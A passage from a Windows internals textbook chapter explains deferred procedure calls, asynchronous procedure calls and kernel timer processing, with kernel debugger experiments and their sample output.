Mode Access Prevention (SMAP) or Privileged Access Never (PAN), Windows activates these features
for the duration of the DPC queue processing (and routine execution), ensuring that any user-mode
memory access will immediately result in a bugcheck.
Another side effect of DPCs interrupting the execution of threads is that they end up “stealing”
from the run time of the thread; while the scheduler thinks that the current thread is executing, a DPC
is executing instead. In Chapter 4, Part 1, we discussed mechanisms that the scheduler uses to make
up for this lost time by tracking the precise number of CPU cycles that a thread has been running and
deducting DPC and ISR time, when applicable.
While this ensures the thread isn't penalized in terms of its quantum, it does mean that from the user's perspective, wall time (also sometimes called clock time—the real-life passage of time) is still
being spent on something else. Imagine a user currently streaming their favorite song off the Internet:
If a DPC were to take 2 seconds to run, those 2 seconds would result in the music skipping or repeat-
ing in a small loop. Similar impacts can be felt on video streaming or even keyboard and mouse input.
Because of this, DPCs are a primary cause for perceived system unresponsiveness of client systems or
workstation workloads because even the highest-priority thread will be interrupted by a running DPC.
To address this problem, Windows supports threaded DPCs. Threaded DPCs, as their name implies, function by executing the DPC routine at passive level on a real-time priority (priority 31) thread. This allows the DPC to preempt most user-mode threads (because most application threads don't run at real-time priority levels), but allows other interrupts, nonthreaded DPCs, APCs, and other priority 31 threads to preempt the routine.
The threaded DPC mechanism is enabled by default, but you can disable it by adding a DWORD value named ThreadDpcEnable to the registry and setting it to 0. A threaded DPC must be initialized by a developer through the KeInitializeThreadedDpc API, which sets the DPC internal type to ThreadedDpcObject. Because threaded
DPCs can be disabled, driver developers who make use of threaded DPCs must write their routines
following the same rules as for nonthreaded DPC routines and cannot access paged memory, perform
dispatcher waits, or make assumptions about the IRQL level at which they are executing. In addition,
they must not use the KeAcquire/ReleaseSpinLockAtDpcLevel APIs because the functions assume the
CPU is at dispatch level. Instead, threaded DPCs must use KeAcquire/ReleaseSpinLockForDpc, which
performs the appropriate action after checking the current IRQL.
Threaded DPCs can be disabled at the discretion of a system administrator. As such, the vast majority of DPCs still execute nonthreaded and can result in perceived system lag. Windows employs a vast arsenal of performance tracking mechanisms to diagnose long-running DPCs, exposing this data through performance counters, as well as through precise ETW tracing.
EXPERIMENT: Monitoring DPC activity
You can use Process Explorer to monitor DPC activity by opening the System Information dialog
box and switching to the CPU tab, where it lists the number of interrupts and DPCs executed each
time Process Explorer refreshes the display (1 second by default):
You can also use the kernel debugger to look at the fields of the KPRCB that begin with Dpc, such as DpcRequestRate, DpcLastCount, DpcTime, and DpcData (which contains the DpcQueueDepth and DpcCount for both nonthreaded and threaded DPCs). Additionally, newer versions of Windows also include an IsrDpcStats field in the KPRCB, of type _ISRDPCSTATS, which can be used to compare the number of DPCs that were queued (both threaded and nonthreaded) versus the number that have executed:
lkd> dx new { QueuedDpcCount = @$prcb->DpcData[0].DpcCount + @$prcb->DpcData[1].DpcCount,
ExecutedDpcCount = ((nt!_ISRDPCSTATS*)@$prcb->IsrDpcStats)->DpcCount },d
QueuedDpcCount : 3370380
ExecutedDpcCount : 1766914 [Type: unsigned __int64]
The discrepancy you see in the example output is expected; drivers might have queued a DPC
that was already in the queue, a condition that Windows handles safely. Additionally, a DPC queued to one processor may execute on a different processor, such as when the driver uses KeSetTargetProcessorDpc (the API allows a driver to target the DPC at a particular processor.)
Windows doesn't just passively expose DPC activity to analysis tools; it also actively monitors it, through a mechanism called the DPC Watchdog, configured through registry values such as DPCTimeout, DpcWatchdogPeriod, and DpcWatchdogProfileOffset.
The DPC Watchdog is responsible for monitoring all execution of code at DISPATCH_LEVEL or above, where a drop in IRQL has not been registered for quite some time. The DPC Timeout, on the other hand, monitors the execution time of a single DPC. By default, a single DPC times out after 20 seconds, and all DISPATCH_LEVEL (and above) execution times out after 2 minutes. Both limits are configurable with the registry values mentioned earlier (DPCTimeout controls a single DPC's time limit, whereas the DpcWatchdogPeriod controls the combined execution of all the code running at high IRQL). When these thresholds are hit, the system will either bugcheck with DPC_WATCHDOG_VIOLATION (indicating which of the situations was encountered), or, if a kernel debugger is attached, raise an assertion that can be continued.
Driver developers who want to do their part in avoiding these situations can use the KeQueryDpcWatchdogInformation API to see the current configured values and the time remaining. Furthermore, the KeShouldYieldProcessor API takes these values (and other system state values) into consideration and returns to the driver a hint used for making a decision whether to continue its DPC work later, or if possible, drop the IRQL back to PASSIVE_LEVEL (in the case where a DPC wasn't executing, but the driver was holding a lock or synchronizing with a DPC in some way).
On the latest builds of Windows 10, each PRCB also contains a DPC Runtime History Table (DpcRuntimeHistoryHashTable), which contains a hash table of buckets tracking specific DPC callback functions that have recently executed and the amount of CPU cycles that they spent running. This information can be queried without access to a UI tool, but more importantly, this data is also now used by the kernel.
When a driver developer queues a DPC through KeInsertQueueDpc, the API will enumerate the history table and check whether this DPC's previous run times have exceeded the LongDpcRuntimeThreshold registry value. If this is the case, the LongDpcPresent field is set in the DpcData structure mentioned earlier.
For each processor (alongside the idle thread), the kernel now also creates a DPC Delegate Thread. These are highly unique threads that never take part in the scheduler's default thread selection algorithms. They are merely kept in the back pocket of the kernel for its own purposes. Figure 8-18 shows a 16-CPU system with its 16 DPC delegate threads. Note that in this case, these threads have a real Thread ID (TID), and the Processor column should be treated as such for them.
FIGURE 8-18 The DPC delegate threads on a 16-CPU system.
Whenever the kernel is dispatching DPCs, it checks whether the DPC queue depth has passed the threshold of such long-running DPCs. If it has, it makes a decision by looking at the properties of the currently executing thread: Is it idle? Is it a real-time thread? Based on these criteria, the kernel may decide to schedule the DPC delegate thread instead, essentially swapping the DPC from its thread-starving position into a dedicated thread, which has the highest priority possible (still executing at DISPATCH_LEVEL). This gives a chance to the old preempted thread (or any other thread in the standby list) to be rescheduled to some other CPU.
This mechanism is similar to the Threaded DPCs we explained earlier, with some exceptions. The delegate thread still runs at DISPATCH_LEVEL. Indeed, when it is created and started in phase 1 of the NT kernel initialization (see Chapter 12 for more details), it raises its own IRQL to DISPATCH level, saves it in the WaitIrql field of its kernel thread data structure, and voluntarily asks the scheduler to perform a context switch to another standby or ready thread (via the KiSwapThread routine.) Thus, the delegate DPCs provide an automatic balancing action that the system takes, instead of an opt-in that driver developers must judiciously leverage on their own.
If you have a newer Windows 10 system with this capability, you can run the following command in
the kernel debugger to take a look at how often the delegate thread was needed, which you can infer
from the amount of context switches that have occurred since boot:
lkd> dx @$cursession.Processes[0].Threads.Where(t => t.KernelObject.ThreadName->
ToDisplayString().Contains("DPC Delegate Thread")).Select(t => t.KernelObject.Tcb.
ContextSwitches),d
[44]  : 2138 [Type: unsigned long]
[52]  : 4 [Type: unsigned long]
[60]  : 11 [Type: unsigned long]
[68]  : 6 [Type: unsigned long]
[76]  : 13 [Type: unsigned long]
[84]  : 3 [Type: unsigned long]
[92]  : 16 [Type: unsigned long]
[100] : 19 [Type: unsigned long]
[108] : 2 [Type: unsigned long]
[116] : 1 [Type: unsigned long]
[124] : 2 [Type: unsigned long]
[132] : 2 [Type: unsigned long]
[140] : 3 [Type: unsigned long]
[148] : 2 [Type: unsigned long]
[156] : 1 [Type: unsigned long]
[164] : 1 [Type: unsigned long]
Asynchronous procedure call interrupts
Asynchronous procedure calls (APCs) provide a way for user programs and system code to execute
in the context of a particular user thread (and hence a particular process address space). Because
APCs are queued to execute in the context of a particular thread, they are subject to thread schedul-
ing rules and do not operate within the same environment as DPCs—namely, they do not operate at
DISPATCH_LEVEL and can be preempted by higher priority threads, perform blocking waits, and access
pageable memory.
That being said, because APCs are still a type of software interrupt, they must somehow still be able to interrupt the execution of the thread they target—they are delivered at APC_LEVEL (IRQL 1). This means that although APCs don't operate under the same restrictions as a DPC, there are still certain limitations imposed that developers must be aware of, which we'll cover shortly.
APCs are described by a kernel control object, called an APC object. APCs waiting to execute reside
in one of two kernel-managed APC queues. Unlike the DPC queues, which are per-processor (and di-
vided into threaded and nonthreaded), the APC queues are per-thread—with each thread having two
APC queues: one for kernel APCs and one for user APCs.
When asked to queue an APC, the kernel looks at the mode (user or kernel) of the APC and then inserts it into the appropriate queue belonging to the thread that will execute the APC routine. Before looking at how an APC executes, it is worth understanding the target thread's possible states. When an APC is queued against a thread, that thread may be in one of the three following situations:
■ The thread is currently running (and may even be the current thread).
■ The thread is currently waiting.
■ The thread is doing something else (ready, standby, and so on).
First, recall that a thread can place itself in an alertable state whenever performing a wait. Unless APCs have been completely disabled for a thread, for kernel APCs, this state is ignored—the APC always aborts the wait, with consequences that will be explained later in this chapter. For user APCs however, the thread is interrupted only if the wait was alertable and instantiated on behalf of a user-mode component or if there are other pending user APCs that already started aborting the wait (which would happen if there were lots of processors trying to queue an APC to the same thread).
If the thread was instead running, a user APC must wait for the thread to either perform an alertable wait or go through a ring transition or context switch that revisits the User APC queue. A kernel APC, on the other hand, executes by raising the IRQL to APC_LEVEL, notifying the processor that it must look at the kernel APC queue of its currently running thread. And, in both scenarios, if the thread was doing "something else," some transition that takes it into either the running or waiting state needs to occur. As a practical result of this, suspended threads, for example, don't execute APCs that are queued to them.
We mentioned that APCs could be disabled for a thread, outside of the previously described scenarios. Kernel and driver developers can choose to do so through two mechanisms, one being to simply keep their IRQL at APC_LEVEL or above while executing some piece of code. Because the APC is delivered through a software interrupt at APC_LEVEL, as was just explained, if the processor is already at APC_LEVEL (or higher), the interrupt is masked out. Therefore, it is
only once the IRQL has dropped to PASSIVE_LEVEL that the pending interrupt is delivered, causing the
APC to execute.
CHAPTER 8 System mechanisms
63
The second mechanism, which is strongly preferred because it avoids changing interrupt controller
state, is to use the kernel API KeEnterGuardedRegion, pairing it with KeLeaveGuardedRegion when you
want to restore APC delivery back to the thread. These APIs are recursive and can be called multiple
times in a nested fashion. It is safe to context switch to another thread while still in such a region because the counters are saved in the SpecialApcDisable and KernelApcDisable fields of the thread's KTHREAD structure—this is per-thread, not per-processor state.
Similarly, context switches can occur while at APC_LEVEL, even though this is per-processor state. The dispatcher saves the IRQL in the thread's WaitIrql field and then sets the processor IRQL to the WaitIrql of the new incoming thread (which could be PASSIVE_LEVEL). This creates an interesting scenario where, technically, a PASSIVE_LEVEL thread can preempt an APC_LEVEL thread. Such a possibility is common and entirely normal, proving that when it comes to thread execution, the scheduler outweighs any IRQL considerations. It is only by raising to DISPATCH_LEVEL, which disables thread preemption, that IRQLs supersede the scheduler. Since APC_LEVEL is the only IRQL that ends up behaving this way, it is often called a thread-local IRQL—not an entirely accurate description, but a sufficient approximation for the behavior described herein.
Regardless of how APCs are disabled by a kernel developer, one rule is paramount: Code can neither return to user mode with the IRQL at anything above PASSIVE_LEVEL nor can SpecialApcDisable be set
to anything but 0. Such situations result in an immediate bugcheck, typically meaning some driver has
forgotten to release a lock or leave its guarded region.
In addition to two APC modes, there are two types of APCs for each mode—normal APCs and spe-
cial APCs—both of which behave differently depending on the mode. We describe each combination:
■ Special Kernel APC This combination results in an APC that is always inserted at the tail of all other existing special kernel APCs in the APC queue but before any normal kernel APCs. The kernel routine receives a pointer to the arguments and to the normal routine of the APC and operates at APC_LEVEL, where it can choose to queue a new, normal APC.
■ Normal Kernel APC This type of APC is always inserted at the tail end of the APC queue, allowing for a special kernel APC to queue a new normal kernel APC that will execute soon thereafter, as described in the earlier example. These kinds of APCs can not only be disabled through the mechanisms presented earlier but also through a third API called KeEnterCriticalRegion (paired with KeLeaveCriticalRegion), which updates the KernelApcDisable counter in KTHREAD but not SpecialApcDisable. These APCs first execute their kernel routine at APC_LEVEL, sending it pointers to the arguments and the normal routine. If the normal routine hasn't been cleared as a result, they then drop the IRQL to PASSIVE_LEVEL and execute the normal routine as well, with the input arguments passed in by value this time. Once the normal routine returns, the IRQL is raised back to APC_LEVEL again.
■ Normal User APC This typical combination causes the APC to be inserted at the tail of the APC queue and for the kernel routine to first execute at APC_LEVEL in the same way as the preceding bullet. If a normal routine is still present, then the APC is prepared for user-mode
delivery (obviously, at PASSIVE_LEVEL) through the creation of a trap frame and exception
frame that will eventually cause the user-mode APC dispatcher in Ntdll.dll to take control of the
thread once back in user mode, and which will call the supplied user pointer. Once the user-
mode APC returns, the dispatcher uses the NtContinue or NtContinueEx system call to return to
the original trap frame.
Note that if the kernel routine ended up clearing out the normal routine, then the thread, if alerted, loses that state, and, conversely, if not alerted, becomes alerted, and the user APC pending state is set. This alert is eventually delivered through a test-alert performed by the KeTestAlertThread API; no normal routine is executed in user mode, even though the kernel routine cancelled the dispatch.
■ Special User APC This combination of APC is a recent addition to newer builds of Windows 10 and generalizes a special dispensation that was done for the thread termination APC such that other developers can make use of it as well. As you're about to learn, the act of terminating a remote (noncurrent) thread requires the use of an APC, but it must also only occur once all kernel-mode code has finished executing. Delivering the termination as a User APC would fit the bill quite well, but it would mean that a user-mode developer could avoid termination by performing a nonalertable wait or by filling the queue with other User APCs instead.
To fix this dilemma, the kernel long recognized the case where the kernel routine of a User APC was KiSchedulerApcTerminate. In this situation, the User APC was recognized as being "special": it was inserted at the head of the queue, and the "user APC pending" state was always set, which forced execution of the APC at the next user-mode ring transition or context switch to this thread.
This functionality, however, being solely reserved for the termination code path, meant that developers who want to similarly guarantee the execution of their User APC, regardless of alertability state, had to resort to using more complex mechanisms such as manually changing the context of the thread using SetThreadContext, which is error-prone at best. In response, the QueueUserAPC2 API was created, which allows passing in the QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC flag, exposing similar functionality to developers as well. Such APCs will always be added before any other user-mode APCs (except the termination APC, which is now extra special) and will ignore the alertable state of the thread, being delivered as a special user APC.
Table 8-9 summarizes the APC insertion and delivery behavior for each type of APC.
The executive uses kernel-mode APCs to perform operating system work that must be completed within the address space (in the context) of a particular thread. It can use special kernel-mode APCs to direct a thread to stop executing an interruptible system service, for example, or to record the results of an asynchronous I/O operation in a thread's address space. Environment subsystems use special kernel-mode APCs to make a thread suspend or terminate itself or to get or set its user-mode execution context. The Windows Subsystem for Linux (WSL) uses kernel-mode APCs to emulate the delivery of UNIX signals to Subsystem for UNIX Application processes.
TABLE 8-9 APC insertion and delivery

APC Type: Special (kernel)
  Insertion Behavior: Inserted right after the last special APC (at the head of all other normal APCs).
  Delivery Behavior: Kernel routine delivered at APC_LEVEL as soon as IRQL drops, and the thread is not in a guarded region. It is given pointers to arguments specified when inserting the APC.

APC Type: Normal (kernel)
  Insertion Behavior: Inserted at the tail of the kernel-mode APC list.
  Delivery Behavior: Kernel routine delivered at APC_LEVEL as soon as IRQL drops, and the thread is not in a critical (or guarded) region. It is given pointers to arguments specified when inserting the APC. Executes the normal routine, if any, at PASSIVE_LEVEL after the associated kernel routine was executed. It is given arguments returned by the associated kernel routine (which can be the original arguments used during insertion or new ones).

APC Type: Normal (user)
  Insertion Behavior: Inserted at the tail of the user-mode APC list.
  Delivery Behavior: Kernel routine delivered at APC_LEVEL as soon as IRQL drops, and the thread has the "user APC pending" flag set (indicating that an APC was queued while the thread was in an alertable wait state). It is given pointers to arguments specified when inserting the APC. Executes the normal routine, if any, in user mode at PASSIVE_LEVEL after the associated kernel routine is executed. It is given arguments returned by the associated kernel routine (which can be the original arguments used during insertion or new ones). If the normal routine was cleared by the kernel routine, it performs a test-alert against the thread.

APC Type: User Thread Terminate APC (KiSchedulerApcTerminate)
  Insertion Behavior: Inserted at the head of the user-mode APC list.
  Delivery Behavior: Immediately sets the "user APC pending" flag and follows similar rules as described earlier but is delivered at PASSIVE_LEVEL on return to user mode, no matter what. It is given arguments returned by the thread-termination special APC.

APC Type: Special (user)
  Insertion Behavior: Inserted at the head of the user-mode APC list but after the thread terminate APC, if any.
  Delivery Behavior: Same as above, but arguments are controlled by the caller of QueueUserAPC2 (NtQueueApcThreadEx2). The kernel routine is the internal KeSpecialUserApcKernelRoutine function that re-inserts the APC, converting it from the initial special kernel APC to a special user APC.
Another important use of kernel-mode APCs is related to thread suspension and termination. Because
these operations can be initiated from arbitrary threads and directed to other arbitrary threads, the
kernel uses an APC to query the thread context as well as to terminate the thread. Device drivers often
block APCs or enter a critical or guarded region to prevent these operations from occurring while they are
holding a lock; otherwise, the lock might never be released, and the system would hang.
When an application issues an asynchronous I/O, for example, and the issuing thread then goes into a wait state, another thread in another process can be scheduled to run. When the device completes the I/O, the I/O system must get back into the context of the thread that initiated the I/O so that it can copy the results of the I/O operation to the buffer in the address space
of the process containing that thread. The I/O system uses a special kernel-mode APC to perform this
action unless the application used the SetFileIoOverlappedRange API or I/O completion ports. In that
case, the buffer will either be global in memory or copied only after the thread pulls a completion item
from the port. (The use of APCs in the I/O system is discussed in more detail in Chapter 6 of Part 1.)
Several Windows APIs—such as ReadFileEx, WriteFileEx, and QueueUserAPC—use user-mode APCs. For example, the ReadFileEx and WriteFileEx functions allow the caller to specify a completion routine to be called when the I/O operation finishes. The I/O completion is implemented by queuing an APC to the thread that issued the I/O. However, the callback to the completion routine doesn't necessarily take place when the APC is queued, because user-mode APCs are delivered to a thread only when it's in an alertable wait state. A thread can enter a wait state either by waiting for an object handle and specifying that its wait is alertable (with the Windows WaitForMultipleObjectsEx function) or by testing directly whether it has a pending APC (using SleepEx). In both cases, if a user-mode APC is pending, the kernel interrupts (alerts) the thread, transfers control to the APC routine, and resumes the thread's execution when the APC routine completes. Unlike kernel-mode APCs, which can execute at APC_LEVEL, user-mode APCs execute at PASSIVE_LEVEL.
APC delivery can reorder the wait queues—the lists of which threads are waiting for what, and in
what order they are waiting. (Wait resolution is described in the section “Low-IRQL synchronization,”
later in this chapter.) If the thread is in a wait state when an APC is delivered, after the APC routine completes, the wait is reissued or re-executed. Because APCs are used to suspend a thread from execution, if the thread is waiting for any objects, its wait is removed until the thread is resumed, after which that thread will be at the end of the list of threads waiting to access the objects it was waiting for. A thread performing an alertable kernel-mode wait will also be woken up during thread termination, allowing such a thread to check whether it woke up as a result of termination or for a different reason.
Timer processing
The system's clock interval timer is probably the most important device on a Windows machine, as evidenced by its high IRQL value (CLOCK_LEVEL) and due to the critical nature of the work it is responsible
for. Without this interrupt, Windows would lose track of time, causing erroneous results in calcula-
tions of uptime and clock time—and worse, causing timers to no longer expire, and threads never to
consume their quantum. Windows would also not be a preemptive operating system, and unless the
current running thread yielded the CPU, critical background tasks and scheduling could never occur on
a given processor.
Timer types and intervals
Traditionally, Windows programmed the system clock to fire at some appropriate interval for the machine, and subsequently allowed drivers, applications, and administrators to modify the clock interval for their needs. This system clock fired in a fixed, periodic fashion, maintained by either the Programmable Interrupt Timer (PIT) chip that has been present on all computers since the PC/AT, or the Real Time Clock (RTC). The PIT works on a crystal that is tuned at one-third the NTSC color carrier frequency, and the HAL uses various achievable multiples to reach millisecond-unit intervals, starting at 1 ms all the way up to 15 ms. The RTC, on the other hand, runs at 32.768 KHz, which, by being a power of two, can easily be configured to run at various intervals that are also powers of two. On RTC-based systems, the APIC Multiprocessor HAL configured the RTC to fire every 15.6 milliseconds, which corresponds to about 64 times a second.
CHAPTER 8 System mechanisms
67
The PIT and RTC have numerous issues: They are slow, external devices on legacy buses, have poor
granularity, force all processors to synchronize access to their hardware registers, are a pain to emu-
late, and are increasingly no longer found on embedded hardware devices, such as IoT and mobile. In
response, hardware vendors created new types of timers, such as the ACPI Timer, also sometimes called
the Power Management (PM) Timer, and the APIC Timer (which lives directly on the processor). The newest timer is the High Performance Event Timer, or HPET, which is a much-improved version of the RTC. On systems with an HPET, it is used instead of the RTC or PIT. Additionally, ARM64 systems have their own timer architecture, called the Generic Interrupt Timer (GIT). The HAL selects the best timer to use on a given system, using the following order:
1. Try to find a synthetic hypervisor timer to avoid any kind of emulation if running inside of a virtual machine.
2. On physical hardware, try to find a GIT. This is expected to work only on ARM64 systems.
3. On x86/x64 systems, try to use the Local APIC timer, if present.
4. Failing that, find an HPET—first an MSI-capable HPET, followed by a legacy periodic HPET, and finally any kind of HPET.
5. If no HPET was found, use the RTC.
6. Should no RTC be found, try to find some other kind of timer, such as the PIT.
7. If no timer has yet been found, the system doesn't actually have a Windows-compatible timer, which should never happen.
The HPET and the LAPIC Timer have one more advantage—other than only supporting the typical periodic mode, they can also be configured in a one-shot mode. This capability will allow recent versions of Windows to leverage a dynamic tick model, which we explain later.
Timer granularity
Some types of Windows applications require very fast response times, such as multimedia applications. For this reason, Windows implements APIs and mechanisms that enable lowering the interval of the system's clock interrupt, which results in more frequent clock interrupts. These mechanisms do not adjust a specific timer's rate (that functionality was added later, through enhanced timers, which we cover in an upcoming section); instead, they end up increasing the resolution of all timers in the system, potentially causing other timers to expire more frequently, too.
That being said, Windows tries its best to restore the clock timer back to its original value whenever it can. Each time a process requests a clock interval change, Windows increases an internal reference count and associates it with the process. Similarly, drivers (which can also change the clock rate) get added to the global reference count. When all drivers have restored the clock and all processes that made requests have exited or released them, Windows restores the clock to its default interval (or to the smallest interval still being requested).
EXPERIMENT: Identifying high-frequency timers
Due to the problems that high-frequency timers can cause, Windows uses Event Tracing for Windows (ETW) to trace all processes and drivers that request a change in the system's clock interval, displaying the time of the occurrence and the requested interval. The current interval is also shown. This data is of great use to both developers and system administrators in identifying the causes of poor battery performance on otherwise healthy systems, as well as to decrease overall power consumption on large systems. To obtain it, simply run powercfg /energy, and you should see a section in the resulting energy-report.html, similar to the one shown here:
Scroll down to the Platform Timer Resolution section, and you see all the applications that changed the timer resolution and the modules that made the call. Timer resolutions are shown in hundreds of nanoseconds, so a period of 20,000 corresponds to 2 ms. In the sample shown, two applications—namely, Microsoft Edge and the TightVNC remote desktop server—each requested a higher resolution.
You can also use the kernel debugger to examine this information through the following fields of the EPROCESS structure:

+0x4a8 TimerResolutionLink : _LIST_ENTRY [ 0xfffffa80'05218fd8 - 0xfffffa80'059cd508 ]
+0x4b8 RequestedTimerResolution : 0
+0x4bc ActiveThreadsHighWatermark : 0x1d
+0x4c0 SmallestTimerResolution : 0x2710
+0x4c8 TimerResolutionStackRecord : 0xfffff8a0'0476ecd0 _PO_DIAG_STACK_RECORD

Note that the debugger shows you an additional piece of information: the smallest timer resolution that was ever requested by a given process. In this example, the process shown corresponds to PowerPoint 2010, which typically requests a lower timer resolution during slideshows but not during slide editing mode. The EPROCESS structure also records the kernel stack that was active at the time of the request, and the stack can be parsed by dumping the PO_DIAG_STACK_RECORD structure.
Finally, the TimerResolutionLink field connects all processes that have made changes to the timer resolution, through the ExpTimerResolutionListHead doubly linked list. Parsing this list with the debugger data model can reveal all processes on the system that have, or had, made changes to the timer resolution, when the powercfg command is unavailable or information on past processes is required. In this example, several Microsoft Edge processes had requested a higher resolution, as did the Remote Desktop Client, and Cortana. WinDbg Preview, however, shows that it not only previously requested it but is still requesting it at the moment this command was written.
lkd> dx -g Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!ExpTimerReso
lutionListHead, "nt!_EPROCESS", "TimerResolutionLink").Select(p => new { Name = ((char*)
p.ImageFileName).ToDisplayString("sb"), Smallest = p.SmallestTimerResolution, Requested =
p.RequestedTimerResolution}),d
======================================================
= = Name = Smallest = Requested =
======================================================
= [0]  - msedge.exe     - 10000    - 0         =
= [1]  - msedge.exe     - 10000    - 0         =
= [2]  - msedge.exe     - 10000    - 0         =
= [3]  - msedge.exe     - 10000    - 0         =
= [4]  - mstsc.exe      - 10000    - 0         =
= [5]  - msedge.exe     - 10000    - 0         =
= [6]  - msedge.exe     - 10000    - 0         =
= [7]  - msedge.exe     - 10000    - 0         =
= [8]  - DbgX.Shell.exe - 10000    - 10000     =
= [9]  - msedge.exe     - 10000    - 0         =
= [10] - msedge.exe     - 10000    - 0         =
= [11] - msedge.exe     - 10000    - 0         =
= [12] - msedge.exe     - 10000    - 0         =
= [13] - msedge.exe     - 10000    - 0         =
= [14] - msedge.exe     - 10000    - 0         =
= [15] - msedge.exe - 10000 - 0 =
= [16] - msedge.exe - 10000 - 0 =
= [17] - msedge.exe - 10000 - 0 =
= [18] - msedge.exe - 10000 - 0 =
= [19] - SearchApp.exe - 40000 - 0 =
======================================================
Timer expiration
As we said, one of the main tasks of the ISR associated with the interrupt that the clock source
generates is to keep track of system time, which is mainly done by the KeUpdateSystemTime routine.
Its second job is to keep track of logical run time, such as process/thread execution times and the
system tick time, which is the underlying number used by APIs such as GetTickCount that developers
use to time operations in their applications. This part of the work is performed by KeUpdateRunTime.
Before doing any of that work, however, KeUpdateRunTime checks whether any timers have expired.
Windows timers can be either absolute timers, which implies a distinct expiration time in the future,
or relative timers, which contain a negative expiration value used as a positive offset from the current
time during timer insertion. Internally, all timers are converted to an absolute expiration time, although
the system keeps track of whether this is the “true” absolute time or a converted relative time. This dif-
ference is important in certain scenarios, such as Daylight Savings Time (or even manual clock changes).
An absolute timer would still fire at “8 PM” if the user moved the clock from 1 PM to 7 PM,
but a relative timer—say, one set to expire “in two hours”—would not feel the effect of the clock
change, because two hours haven’t really elapsed. During system time-change events such as these,
the kernel reprograms the absolute time associated with relative timers to match the new settings.
Because the clock interrupt fires at known interval multiples, each multiple of the system time
that a timer could be associated with is an index called a hand,
which is stored in the timer object's dispatcher header. Windows used that fact to organize all driver
and application timers into linked lists based on an array where each entry corresponds to a possible
multiple of the system time. Because modern versions of Windows 10 no longer necessarily run on a
periodic tick (due to the dynamic tick functionality described later), a hand is instead computed from the upper
46 bits of the due time (which is in 100 ns units). This gives each hand an approximate “time” of 28 ms.
Because at any given tick multiple hands could have expiring timers, Windows can no longer just check the current hand. Instead, a bit-
map tracks each hand in each processor's timer table; pending hands are found through
the bitmap and checked during every clock interrupt.
Regardless of method, these 256 linked lists live in what is called the timer table—which is in the
PRCB—enabling each processor to perform its own independent timer expiration without needing to
acquire a global lock, as shown in Figure 8-19. Recent builds of Windows 10 can have up to two timer
tables, for a total of 512 linked lists.
Because each processor has its own timer table, each processor also does its own timer expiration
work. As each processor gets initialized, the table is filled with absolute timers with an infinite expira-
tion time to avoid any incoherent state. Therefore, to determine whether a clock has expired, it is only
necessary to check if there are any timers on the linked list associated with the current hand.
FIGURE 8-19 Example of per-processor timer lists.
Although updating counters and checking a linked list are fast operations, going through every
timer and expiring it is a potentially costly operation—keep in mind that all this work is currently being
performed at CLOCK_LEVEL, an exceptionally elevated IRQL. Similar to how a driver ISR queues a DPC
to defer its work, the clock ISR requests a DISPATCH_LEVEL software interrupt and sets a flag so that the DPC
draining mechanism knows timers need expiration. Likewise, when updating process/thread runtime, if
the clock ISR determines that a thread has expired its quantum, it also queues a DPC software interrupt
and sets a different flag. These flags are per-PRCB because each processor normally does its own
processing of run-time updates, because each processor is running a different thread and has different
tasks associated with it.
DPCs are provided primarily for device drivers, but the kernel uses them, too. The kernel most fre-
quently uses a DPC to handle quantum expiration. At every tick of the system clock, an interrupt occurs
at clock IRQL. The clock interrupt handler (running at clock IRQL) updates the system time and then
decrements a counter that tracks how long the current thread has run. When the counter reaches 0, the
thread's quantum has expired and the kernel might need to reschedule the processor, a lower-
priority task that should be done at DPC/dispatch IRQL. The clock interrupt handler queues a DPC to
initiate thread dispatching, then finishes its work and lowers the processor's IRQL. Because the DPC
interrupt has a lower priority than do device interrupts, any pending device interrupts that surface
before the clock interrupt completes are handled before the DPC interrupt occurs.
Once the IRQL eventually drops back to DISPATCH_LEVEL, as part of DPC processing, these two
flags are picked up and processed; Table 8-10 describes the relevant KPRCB fields.
72
CHAPTER 8 System mechanisms
TABLE 8-10 Timer processing KPRCB fields

KPRCB Field                Type                 Description
LastTimerHand              Index (up to 256)    The last timer hand that was processed by this processor. In recent
                                                builds, part of TimerTable because there are now two tables.
ClockOwner                 Boolean              Indicates whether the current processor is the clock owner.
TimerTable                 KTIMER_TABLE         List heads for the timer table lists (256, or 512 on more recent builds).
DpcNormalTimerExpiration   Bit                  Indicates that a DISPATCH_LEVEL interrupt has been raised to request
                                                timer expiration.
Chapter 4 of Part 1 covers the actions related to thread scheduling and quantum expiration. Here,
we look at the timer expiration work. Because the timers are linked together by hand, the expira-
tion code (executed by the DPC associated with the PRCB in the TimerExpirationDpc field, typically
KiTimerExpirationDpc) parses this list from head to tail. (At insertion time, the timers nearest to the
clock interval multiple will be first, followed by timers closer and closer to the next interval, but still
within this hand.) There are two primary tasks to expiring a timer:
■ The timer is treated as a dispatcher synchronization object (threads are waiting on the timer as
part of a timeout or directly as part of a wait). The wait-testing and wait-satisfaction algorithms
will be run on the timer. This work is described in a later section on synchronization in this chap-
ter. This is how user-mode applications, and some drivers, make use of timers.
■ The timer is treated as a control object associated with a DPC callback routine that executes
when the timer expires. This method is reserved only for drivers and enables very low latency
response to timer expiration. (The wait/dispatcher method requires all the extra logic of wait
signaling.) Additionally, because timer expiration itself executes at DISPATCH_LEVEL, where
DPCs also run, it is perfectly suited as a timer callback.
As each processor wakes up to handle the clock interval timer to perform system-time and run-time
processing, it therefore also processes timer expirations after a slight latency/delay in which the IRQL
drops from CLOCK_LEVEL to DISPATCH_LEVEL. Figure 8-20 shows this behavior on two processors:
the solid arrows indicate the clock interrupt firing, whereas the dotted arrows indicate any expira-
tion processing that might occur if the processor had associated timers.
FIGURE 8-20 Timer expiration.
Processor selection
A critical determination that must be made when a timer is inserted is to pick the appropriate table to
use; in other words, the most optimal processor choice. First, the kernel checks whether timer serial-
ization is disabled. If it is, it then checks whether the timer has a DPC associated with its expiration, and
if the DPC has been affinitized to a target processor, that processor's timer table is selected.
If the timer has no DPC associated with it, or if the DPC has not been bound to a processor, the kernel
scans all processors in the current processor's group that have not been parked. (For more informa-
tion on core parking, see Chapter 4 of Part 1.) If the current processor is parked, it picks the next closest
neighboring unparked processor in the same NUMA node; otherwise, the current processor is used.
This behavior is intended to improve performance and scalability on server systems that make use
of Hyper-V, although it can improve performance on any heavily loaded system. As system timers pile
up—because most drivers do not affinitize their DPCs—CPU 0 becomes more and more congested
with the execution of timer expiration code, which increases latency and can even cause heavy delays
or missed DPCs. Additionally, timer expiration can start competing with DPCs typically associated with
driver interrupt processing, such as network packet code, causing systemwide slowdowns. This process
is exacerbated in a Hyper-V scenario, where CPU 0 must process the timers and DPCs associated with
potentially numerous virtual machines, each with their own timers and associated devices.
